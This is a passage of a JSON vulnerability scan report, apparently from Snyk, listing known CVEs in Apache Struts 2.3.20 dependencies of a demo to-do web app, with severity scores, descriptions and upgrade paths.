"alternativeIds": [], + "disclosureTime": "2023-12-05T09:33:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2023-12-06T08:01:07.098280Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:10.404666Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.32" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", + "title": "Parameter Alteration", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "rskvp93" + ], + "semver": { + "vulnerable": [ + "[2,2.3.24.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.24.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-026.html", + "title": "Apache Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:10.273105Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Parameter Alteration. ValueStack defines special top object which represents root of execution context. It can be used to manipulate Struts' internals or can be used to affect container's settings\n\n\n## References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-026.html)\n", + "epssDetails": { + "percentile": "0.70008", + "probability": "0.00305", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-5209" + ], + "CWE": [ + "CWE-235" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.673000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-09-28T16:59:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2015-09-28T16:59:30Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:01.496065Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.1", + "org.apache.struts.xwork:xwork-core@2.3.24.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.28)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.28" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/15857a69e7baf3675804495a5954cd0756ac8364", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:29.964282Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.122257Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:29.964282Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation via a `%{}` sequence in a tag attribute, aka forced double OGNL evaluation.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.28 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/15857a69e7baf3675804495a5954cd0756ac8364)\n", + "epssDetails": { + "percentile": "0.88004", + "probability": "0.01731", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-0785" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.686000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-03-16T05:58:06Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-03-16T05:58:06Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:29.964282Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28", + "org.apache.struts.xwork:xwork-core@2.3.28" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.25)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.25" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/fc2179cf1ac9fbfb61e3430fa88b641d87253327", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2162", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:47.186038Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:24.610273Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.186038Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.x before 2.3.25 does not sanitize text in the Locale object constructed by I18NInterceptor, which might allow remote attackers to conduct cross-site scripting (XSS) attacks via unspecified vectors involving language display.\n\n## Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n### Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n### Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n### How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2162)", + "epssDetails": { + "percentile": "0.96202", + "probability": "0.18207", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-2162" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.701000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-03-16T07:51:26.242000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-03-16T07:51:26.242000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:47.186038Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28", + "org.apache.struts.xwork:xwork-core@2.3.28" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.24.1]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:35.405967Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)", + "epssDetails": { + "percentile": "0.90602", + "probability": "0.02732", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3093" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.713000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-02T02:16:48.918000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-06-02T02:16:48.918000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:50.033229Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.3", + "org.apache.struts.xwork:xwork-core@2.3.24.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", + "title": "Access Restriction Bypass", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.28.1]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.417349Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n## Remediation\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n", + "epssDetails": { + "percentile": "0.77304", + "probability": "0.00531", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4433" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.724000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-21T01:33:07Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-06-21T01:33:07Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:52.478661Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29", + "org.apache.struts.xwork:xwork-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Alvaro Munoz" + ], + "semver": { + "vulnerable": [ + "[2.2.1,2.3.28.1]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-036.html", + "title": "Apache Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:55.264787Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:49.390018Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:55.264787Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Remote code Execution. The Apache Struts frameworks when forced, performs double evaluation of attributes' values assigned to certain tags so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered.\n\n## References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-036.html)\n", + "epssDetails": { + "percentile": "0.94726", + "probability": "0.09408", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4461" + ], + "CWE": [ + "CWE-264" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.738000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-11-14T07:48:03.440000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-11-14T07:48:03.440000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:55.264787Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29", + "org.apache.struts.xwork:xwork-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", + "title": "Regular Expression Denial of Service (ReDoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.3.20, 2.3.29)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.316157Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.29 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n", + "epssDetails": { + "percentile": "0.99401", + "probability": "0.95900", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4465" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.751000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-20T07:45:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not 